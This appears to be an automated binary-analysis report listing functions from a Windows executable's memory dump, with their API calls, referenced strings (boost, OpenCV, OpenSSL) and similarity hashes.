Opcode Fuzzy Hash: 9710171cc75bdb54049572554e24b32ebe35bc54255b3eab302f9bc902894c9d
Instruction Fuzzy Hash: 30E1067080528CDADB11EB64DD45BEEBBB89F52308F2080EEE04577192EB781F84DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004337BF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 301COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004337C3

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004337CE

Part of subcall function 0044DB7B: __EH_prolog.LIBCMT ref: 0044DB80
Part of subcall function 0044DB7B: GetTickCount64.KERNEL32 ref: 0044DBA6

Part of subcall function 004530A5: __EH_prolog.LIBCMT ref: 004530AA

Part of subcall function 004607D1: __EH_prolog.LIBCMT ref: 004607D6
Part of subcall function 004607D1: GetComputerNameW.KERNEL32 ref: 0046080D

Part of subcall function 00471490: __EH_prolog.LIBCMT ref: 00471495
Part of subcall function 00471490: GetUserNameW.ADVAPI32(00000000,?), ref: 004714E1

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E

Strings

Z, xrefs: 00433A20

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Name$ComputerCount64DeallocateExceptionException@8RaiseThrd_sleepThrowTickUserstd::_
String ID: Z
API String ID: 67087267-1505515367
Opcode ID: a7586081fbc4e38cfeabfd0611894ee6694c0f71f70b17a0910cf2ca7ac725a2
Instruction ID: e75bd0fc9609dba1d425c70c7c75589d46f10d8bf46f197f3992a8929ad6dd56
Opcode Fuzzy Hash: a7586081fbc4e38cfeabfd0611894ee6694c0f71f70b17a0910cf2ca7ac725a2
Instruction Fuzzy Hash: E1C1D670C05298EEDB11EB64DD85BDDBBB89F56308F1040EEE04577192DA781F84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 005CEA70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005CEB37
__CxxThrowException@8.LIBVCRUNTIME ref: 005CECED

Part of subcall function 005CED90: CreateDirectoryExW.KERNEL32(?,?,00000000,?,00435880,005CED1C,?,00000000,00435880,?), ref: 005CEDD3

Strings

boost::filesystem::create_directories, xrefs: 005CEAB6, 005CECA3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Exception@8Throw$CreateDirectory
String ID: boost::filesystem::create_directories
API String ID: 2901307233-2171239142
Opcode ID: 82fe8898462eabbab5a3bd5137425dea576a5c3d04c8123f9ad834508d30b31a
Instruction ID: 6f7992f25592b5bb747cf72b30758f9e2d9695e2689a35dec5efe62210ded7d9
Opcode Fuzzy Hash: 82fe8898462eabbab5a3bd5137425dea576a5c3d04c8123f9ad834508d30b31a
Instruction Fuzzy Hash: B6919E70D002199ECF20DBE4C886FEEBBB8BF55314F14456EE406A7241EB75AE49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0043663F, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 218COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00436644

Part of subcall function 00460981: __EH_prolog.LIBCMT ref: 00460986

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 004734EE: __EH_prolog.LIBCMT ref: 004734F3

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Strings

T, xrefs: 004366E6
1.38, xrefs: 0043672A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_
String ID: 1.38$T
API String ID: 89631465-1427993570
Opcode ID: 40d44448988a5a742bb1c8ee57168924ebf233450986da7114f1510c042b3ffe
Instruction ID: 6e48d48c6e03148c8822514970cb7de93f123c4316aff54180176b026ae7daa5
Opcode Fuzzy Hash: 40d44448988a5a742bb1c8ee57168924ebf233450986da7114f1510c042b3ffe
Instruction Fuzzy Hash: DB810971C0528CE9DB11DBA8DD81BDDBBB89F66308F20419EE04577192DB741F48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0044F6C7, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044F6CC

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Strings

p, xrefs: 0044F74A
G, xrefs: 0044F6F6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_
String ID: G$p
API String ID: 3881773970-729404109
Opcode ID: 2e5a76f93478adc4bea7e1237e5e18b0fce07ae8bc25307e66b64b5cc290ba7d
Instruction ID: 40a51d229db9341d0e7df531c53e4d1e5e657513680bd561c8e3345f316e5f19
Opcode Fuzzy Hash: 2e5a76f93478adc4bea7e1237e5e18b0fce07ae8bc25307e66b64b5cc290ba7d
Instruction Fuzzy Hash: 7A71D671C05288EAEB10DBE9D9457DDBFB8AF55304F1040AEE045A7182DB781B48CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00434D53, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00434D58

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Strings

"vY, xrefs: 00434DDE
wAg, xrefs: 00434E37

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: "vY$wAg
API String ID: 3519838083-1768716462
Opcode ID: 1877cc48cbd2615171e376e896b90516b375133b3337d0019055c7081da2954a
Instruction ID: 2fa68a94fd0d32a5c8376383fa7a0e4f225435e4e624bbceb963ee89a754a304
Opcode Fuzzy Hash: 1877cc48cbd2615171e376e896b90516b375133b3337d0019055c7081da2954a
Instruction Fuzzy Hash: 5871AE70C04248EEEF10DFA9D985BDEBBB9EF95304F10409EE045A7252DBB86A44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 005E0BD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

crypto\async\async.c, xrefs: 005E0C1E, 005E0C6D, 005E0C92, 005E0CDF, 005E0CF9, 005E0D4D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: crypto\async\async.c
API String ID: 0-1899283870
Opcode ID: 39b47971c08dc4f6c7a5e15d589044e6103f360b1e8e4be50bd84a01db1e8ca4
Instruction ID: da3c53c4a4a0aebb8a8b2fc7cab16ca0a612ea9429f93283b614a609741fc94c
Opcode Fuzzy Hash: 39b47971c08dc4f6c7a5e15d589044e6103f360b1e8e4be50bd84a01db1e8ca4
Instruction Fuzzy Hash: 66411DB57807067AF63036556C4BF6B7F48BB90B56F240027FA88AC2C3FAD299508571

Uniqueness

Uniqueness Score: -1.00%

Function 00432DF8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432DFD

Part of subcall function 00415489: __EH_prolog.LIBCMT ref: 0041548E
Part of subcall function 00415489: new.LIBCMT ref: 004154A0
Part of subcall function 00415489: new.LIBCMT ref: 004154DE

Part of subcall function 0041EE30: __EH_prolog.LIBCMT ref: 0041EE35

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

Part of subcall function 00452F81: __EH_prolog.LIBCMT ref: 00452F86
Part of subcall function 00452F81: socket.WS2_32(00000002,00000002,00000000), ref: 00452FB4

Part of subcall function 00416C3E: htons.WS2_32(?), ref: 00416C76
Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C8D
Part of subcall function 00416C3E: htonl.WS2_32(00000000), ref: 00416C94

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

bind, xrefs: 00432EE6
open, xrefs: 00432E81

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$htonl$Deallocatehtonssocketstd::_
String ID: bind$open
API String ID: 2957969969-2728503700
Opcode ID: 4dc73e65c0e8802f33853bd3fefa119c04e24c7fee4e2356a51acde1825792e0
Instruction ID: 4ca38705aeddfdfacb98326116f125cd93acbfa0a6ffbd9d5e20148db8a6d732
Opcode Fuzzy Hash: 4dc73e65c0e8802f33853bd3fefa119c04e24c7fee4e2356a51acde1825792e0
Instruction Fuzzy Hash: AE517E71C0529CEEDB11EBE5D991BEEBBB4AF14304F1080AFE105A7182DA741B88DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004334AB, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004334B0

Part of subcall function 004333A6: __EH_prolog.LIBCMT ref: 004333AB

Strings

'rY, xrefs: 004335C9
rY, xrefs: 00433581

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: rY$'rY
API String ID: 3519838083-1727070709
Opcode ID: 46b618b54424aa12287b3cb71aa652064b017c339009dea8a79aeea476fad357
Instruction ID: 692f344c23351cecb39725d4d3077dfbbdfcf21885d61712d72860f172fa44e3
Opcode Fuzzy Hash: 46b618b54424aa12287b3cb71aa652064b017c339009dea8a79aeea476fad357
Instruction Fuzzy Hash: 674129B5E00219AFCB14CFA9C8449AEBBF5BF8C751F24416EE409E7310DB359A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004331C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004331CD

Part of subcall function 004330E8: __EH_prolog.LIBCMT ref: 004330ED

Strings

'rY, xrefs: 004332CC
rY, xrefs: 00433296

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: rY$'rY
API String ID: 3519838083-1727070709
Opcode ID: fb37b0818a0e19826a2187efdc4dcf1040dcd67f2b122291d9ba0d5725a1927b
Instruction ID: 0f5e3793816f3bba2d34fd07c16d742ccfd9016c05c8c025a83938d6cef4e951
Opcode Fuzzy Hash: fb37b0818a0e19826a2187efdc4dcf1040dcd67f2b122291d9ba0d5725a1927b
Instruction Fuzzy Hash: 224108B5E022199FCB14CFA9C584AAEBBB4BF4CB11F10419AE905E7350C7359E41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005CF600, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(CAAA386B,?,00000000,?), ref: 005CF637
__CxxThrowException@8.LIBVCRUNTIME ref: 005CF730

Strings

boost::filesystem::status, xrefs: 005CF6E6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorException@8LastThrow
String ID: boost::filesystem::status
API String ID: 1006195485-3746320807
Opcode ID: e42739a45e596990b7cfc16a74c72c3356f572ff7a6c8eda62e78dd9af7f037f
Instruction ID: 02e877792801fd1c8b06ca71dec80e0a00fba2e46346229c47f147163ae3cec5
Opcode Fuzzy Hash: e42739a45e596990b7cfc16a74c72c3356f572ff7a6c8eda62e78dd9af7f037f
Instruction Fuzzy Hash: AB418D719002199FCB24EF98C884BADBFB6FF45314F25813EE819AB261D7749C44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004165B5, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004165BA

Strings

d, xrefs: 004165D0
Day of month is not valid for year, xrefs: 00416694

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: Day of month is not valid for year$d
API String ID: 3519838083-3980292007
Opcode ID: f0d9c1bc68be35919035e67856b0244b9289362c3dc5eae8e337aafa6987f361
Instruction ID: aa6edb0c93ecd5314a4e0f99c3c8531e0ddc2fcbff495adc8c709a8d16015b63
Opcode Fuzzy Hash: f0d9c1bc68be35919035e67856b0244b9289362c3dc5eae8e337aafa6987f361
Instruction Fuzzy Hash: 8E310872B402159AEB14CF79CD0A7FEB7A69B54314F06812BE504E72C4EA78CD44C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 004B755A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B755F

Part of subcall function 004B4FA0: __EH_prolog.LIBCMT ref: 004B4FA5
Part of subcall function 004B4FA0: new.LIBCMT ref: 004B4FF1

Part of subcall function 004B503A: __EH_prolog.LIBCMT ref: 004B503F
Part of subcall function 004B503A: __CxxThrowException@8.LIBVCRUNTIME ref: 004B50A1

Strings

class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::string_path<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct boost::property_tree::id_transla, xrefs: 004B767C
Path syntax error, xrefs: 004B764E

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: Path syntax error$class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __thiscall boost::property_tree::string_path<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct boost::property_tree::id_transla
API String ID: 1007369359-3032971650
Opcode ID: d83d79e383c565747753cb6d7d2e8b13fbfe887c25e26a7b3aa449f8507c41b9
Instruction ID: 1fe75e96094b70f8ad0054a53985330ea68fc853070fa1b5f7cb6a6fcb7f7e63
Opcode Fuzzy Hash: d83d79e383c565747753cb6d7d2e8b13fbfe887c25e26a7b3aa449f8507c41b9
Instruction Fuzzy Hash: 42418A71904249EFDB04DFA9C984AEDFBB4FF40304F14412EE405A7292D778AE95CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 005D4080, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 005D4310: ___std_exception_copy.LIBVCRUNTIME ref: 005D4362

new.LIBCMT ref: 005D40E6

Strings

E], xrefs: 005D40CC
LH], xrefs: 005D40B0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ___std_exception_copy
String ID: E]$LH]
API String ID: 2659868963-3060650702
Opcode ID: 0c351b6edecfc6111b731765818db5293a636fc564cbfc4faae53335fdc93eeb
Instruction ID: bd9410c490ee1d573dee63c77907cfe87397a9c892b7ca0e80118e31d218f4e5
Opcode Fuzzy Hash: 0c351b6edecfc6111b731765818db5293a636fc564cbfc4faae53335fdc93eeb
Instruction Fuzzy Hash: C531CBB0A05309EFDB10DF68D845B59BBB4FF09724F10026EE8188B381E779E955CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004224DD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004224E2
std::_Winerror_message.LIBCPMT ref: 0042252A

Part of subcall function 00584505: FormatMessageW.KERNEL32(00001200,00000000,00000008,00000000,?,00000000,00000000,00000000,00000000,00000001,00007FFF,00000000,?,00007FFF,00007FFF,00000000), ref: 00584553
Part of subcall function 00584505: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 00584572

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

unknown error, xrefs: 00422539

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$ByteCharDeallocateFormatH_prologMessageMultiWideWinerror_message
String ID: unknown error
API String ID: 2358782872-3078798498
Opcode ID: 467a4f7fc72ed59cf964f76a594396310bfa524d44de8c67ba53d300565f4ec2
Instruction ID: 6108e8fbc585725bae20dc5b15ae57025f41918aac55a4ea7dc56692084daffb
Opcode Fuzzy Hash: 467a4f7fc72ed59cf964f76a594396310bfa524d44de8c67ba53d300565f4ec2
Instruction Fuzzy Hash: 5B2159B2D0511DABCB00EF99D8919EEFFB8EF59354F44002EE505B7212D7746A88CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 005CF000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,00000001,00000001,00000001,?,?,00000001,00000000,00000001,00000000,00000000,?,?,?), ref: 005CF042
GetLastError.KERNEL32(?,?,boost::filesystem::file_size,?,?), ref: 005CF053

Part of subcall function 005D46A0: __CxxThrowException@8.LIBVCRUNTIME ref: 005D4749

Strings

boost::filesystem::file_size, xrefs: 005CF04C, 005CF080

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesErrorException@8FileLastThrow
String ID: boost::filesystem::file_size
API String ID: 1873943377-1937220381
Opcode ID: db774dc388341c81d66171dc989d389095fd4218b21e0031342f63a9153e303d
Instruction ID: eabdad901f33c0dc12b289c500b2f4331796d6d1a375e139be6d6f11c64f59c3
Opcode Fuzzy Hash: db774dc388341c81d66171dc989d389095fd4218b21e0031342f63a9153e303d
Instruction Fuzzy Hash: 9E112331A002005FD310AB39DC4AB2B7BD5BF89B30F944B1EF05A961C1D7B4D8008792

Uniqueness

Uniqueness Score: -1.00%

Function 00526860, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00526865

Strings

%s:%d: error: (%d) %s, xrefs: 005268D8
%s:%d: error: (%d) %s in function %s, xrefs: 005268A3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: %s:%d: error: (%d) %s$%s:%d: error: (%d) %s in function %s
API String ID: 3519838083-3777411579
Opcode ID: 946b656d3ccefa19872962e981c90b3b8d102dac9df1bd8440715e59e56489d0
Instruction ID: 4ccea0192ace5affc3e80e56c8df7a7576fd484cde543b620d4a3d333096873b
Opcode Fuzzy Hash: 946b656d3ccefa19872962e981c90b3b8d102dac9df1bd8440715e59e56489d0
Instruction Fuzzy Hash: FD219F71800719EFEB18DF94D845AAABBF5FF06304F50095DE016575E2E7B2EA84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004231EA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004231EF
__To_byte.LIBCPMT ref: 0042322B

Strings

invalid wchar_t filename argument, xrefs: 00423236

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTo_byte
String ID: invalid wchar_t filename argument
API String ID: 2823267341-1601001258
Opcode ID: 42f42d30732fc04f8b3ec3f129233cab13a203ef840f55bb275251f43b13b6ba
Instruction ID: f041f88476bd70d9e55b7f90aabdec7a9fba3aca7393ca4c5040615faeca2fb0
Opcode Fuzzy Hash: 42f42d30732fc04f8b3ec3f129233cab13a203ef840f55bb275251f43b13b6ba
Instruction Fuzzy Hash: B3118EB29042099ECB10EFA9D981AEEFBF8FF48314F10016FE504A7201DB745B84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004B607E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 004B60FF

Strings

IsString(), xrefs: 004B609D
rhs.IsString(), xrefs: 004B60BF

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _memcmp
String ID: IsString()$rhs.IsString()
API String ID: 2931989736-3903486248
Opcode ID: 2bbd160786a96e9dabfdba009fb99b1734b9d4c065814c35736bc7994aaa9fe4
Instruction ID: 0f701768cc556a09b3f67f8e49e637bb5103caae27dc64a973d385550b1ac489
Opcode Fuzzy Hash: 2bbd160786a96e9dabfdba009fb99b1734b9d4c065814c35736bc7994aaa9fe4
Instruction Fuzzy Hash: E401F762A0421172AD1036795C828BB738DCBE3B98B01003BF90597742E9AE8C0652BE

Uniqueness

Uniqueness Score: -1.00%

Function 00508954, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00508959
swprintf.LIBCMT ref: 005089CF

Strings

%02x, xrefs: 005089C1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologswprintf
String ID: %02x
API String ID: 723770199-560843007
Opcode ID: e31e01e6f943849ffa86725ead3cabea827d92710ae4f086a1d1ae424f08c144
Instruction ID: 96f198674f4598fe0da5d80f9c493f1924c04696cae716ec7ad006bd1d63d99c
Opcode Fuzzy Hash: e31e01e6f943849ffa86725ead3cabea827d92710ae4f086a1d1ae424f08c144
Instruction Fuzzy Hash: 8511D0B1D04258EBDB00EF99C581AFEFFB4FF04314F14046EE98567282C7B95A4487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00420875, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042087A
new.LIBCMT ref: 00420897

Strings

2B, xrefs: 004208BB

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 2B
API String ID: 3519838083-2445177625
Opcode ID: c44ce58308eb5a48e53129c11db8eabde19dace27f19670bf82873417d927ecc
Instruction ID: 0ac52ed68039120b99c75f24206eff0401453f0e9003d737ffa1a357b209e6cb
Opcode Fuzzy Hash: c44ce58308eb5a48e53129c11db8eabde19dace27f19670bf82873417d927ecc
Instruction Fuzzy Hash: E41137B1A0160ADFCB14DFA9D5402AAFBF1FF88311F20856ED449E3702E7705A00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0047E8A8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0042FC69), ref: 0047E900
GetCurrentProcess.KERNEL32(0000001D,00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,?,0042FC69), ref: 0047E91B

Strings

D, xrefs: 0047E8C9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CurrentLibraryLoadProcess
String ID: D
API String ID: 2934848855-2746444292
Opcode ID: 95cb41975cdac49083b128e6f918a75402d003f9cfa742b2c6257d57799dc649
Instruction ID: b655e112bcf193d03bb4447e8dbe0170a1772b2ec2f11f0a8e34b1e5620e1d61
Opcode Fuzzy Hash: 95cb41975cdac49083b128e6f918a75402d003f9cfa742b2c6257d57799dc649
Instruction Fuzzy Hash: 08114872911348AAEB00DBF8ED057EDB7ACEF5D304F10526AEA05E9090E7749684C268

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F6FA
GetProcessHeap.KERNEL32(007A29C4,?,004F4CBE,?,4s,?,?,004F508D,?,?,00403520), ref: 0040F717

Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2

Strings

Tz, xrefs: 0040F792

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologHeapProcess__onexit
String ID: Tz
API String ID: 3671622277-2318832878
Opcode ID: e0eafd52c1c830bb8e6c8791c8d87991a7a389f57a1034608d3fef0e5f132d37
Instruction ID: 839f150a8a5d501b72f51f15b3c6a476b49f3470d528c605fd5a46d2b99ea3e3
Opcode Fuzzy Hash: e0eafd52c1c830bb8e6c8791c8d87991a7a389f57a1034608d3fef0e5f132d37
Instruction Fuzzy Hash: FC114F71D06B44DEC750DF68A9456497BA3F78A711B50822EE418CB2A2D77C49548B08

Uniqueness

Uniqueness Score: -1.00%

Function 00426744, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426749

Part of subcall function 00426654: __EH_prolog.LIBCMT ref: 00426659

Part of subcall function 00420F37: __EH_prolog.LIBCMT ref: 00420F3C
Part of subcall function 00420F37: std::exception::exception.LIBCONCRT ref: 00420F54

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Strings

dB, xrefs: 0042677C
"gB, xrefs: 00426798

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_std::exception::exception
String ID: "gB$dB
API String ID: 153459401-1691998663
Opcode ID: 52aa9dfd4b8d0985a60d5ce0b38a38032dfe576f5e0ab8537f452411d36898af
Instruction ID: 93782f494ba01e940c8de4254948f93017c889fcedf2d5522df6caf55753ce6c
Opcode Fuzzy Hash: 52aa9dfd4b8d0985a60d5ce0b38a38032dfe576f5e0ab8537f452411d36898af
Instruction Fuzzy Hash: C611CE7290124DEBDB00EF99C901BDDFFB5EF14324F10814EE5106B292DBB95654DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00532D66, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00532D6B

Part of subcall function 00526915: __EH_prolog.LIBCMT ref: 0052691A

Part of subcall function 00526747: __EH_prolog.LIBCMT ref: 0052674C

Part of subcall function 00526972: __CxxThrowException@8.LIBVCRUNTIME ref: 00526A67

Strings

Failed to allocate %lu bytes, xrefs: 00532D9F
cv::OutOfMemoryError, xrefs: 00532D8D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw
String ID: Failed to allocate %lu bytes$cv::OutOfMemoryError
API String ID: 1007369359-255125719
Opcode ID: 06a199d06ec91613aa1f69611cc07f16b3b59c01b79db57447051bd22eb1c95a
Instruction ID: ab5bdab6b197a06c747e07827ce1222954709d7041fbdea029814ad387865ae6
Opcode Fuzzy Hash: 06a199d06ec91613aa1f69611cc07f16b3b59c01b79db57447051bd22eb1c95a
Instruction Fuzzy Hash: BD01F972D12128AADB15E7E8DC0AFDD7BB8AF55310F14419EE210571C2EBB45B48C761

Uniqueness

Uniqueness Score: -1.00%

Function 004B4FA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B4FA5

Part of subcall function 004B7A73: __EH_prolog.LIBCMT ref: 004B7A78

Part of subcall function 00420F37: __EH_prolog.LIBCMT ref: 00420F3C
Part of subcall function 00420F37: std::exception::exception.LIBCONCRT ref: 00420F54

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

new.LIBCMT ref: 004B4FF1

Part of subcall function 004B4B4E: __EH_prolog.LIBCMT ref: 004B4B53

Strings

dB, xrefs: 004B4FD3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Deallocatestd::_std::exception::exception
String ID: dB
API String ID: 153459401-2104629891
Opcode ID: c6a8a7cc6aac30ce1ad07a47a50f6f7b030aae0dfb06584cd55b4293e8149819
Instruction ID: 495a43c55d09c925d0ae03b5d4608425af67aeac8f68a042b7901775e42f67cc
Opcode Fuzzy Hash: c6a8a7cc6aac30ce1ad07a47a50f6f7b030aae0dfb06584cd55b4293e8149819
Instruction Fuzzy Hash: C911C271904289EADB11EFA9C506BCDFFF5EF54324F20818EE5506B282C7B94740CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00526A6D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00526A72
std::exception::exception.LIBCMT ref: 00526A83

Part of subcall function 0040F323: ___std_exception_copy.LIBVCRUNTIME ref: 0040F341

Strings

%gR, xrefs: 00526A93

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog___std_exception_copystd::exception::exception
String ID: %gR
API String ID: 238416039-1847496865
Opcode ID: e7ec8c1aeff8aea54c0622960873d249bf79ad0e652b139f01fc3f524725f57b
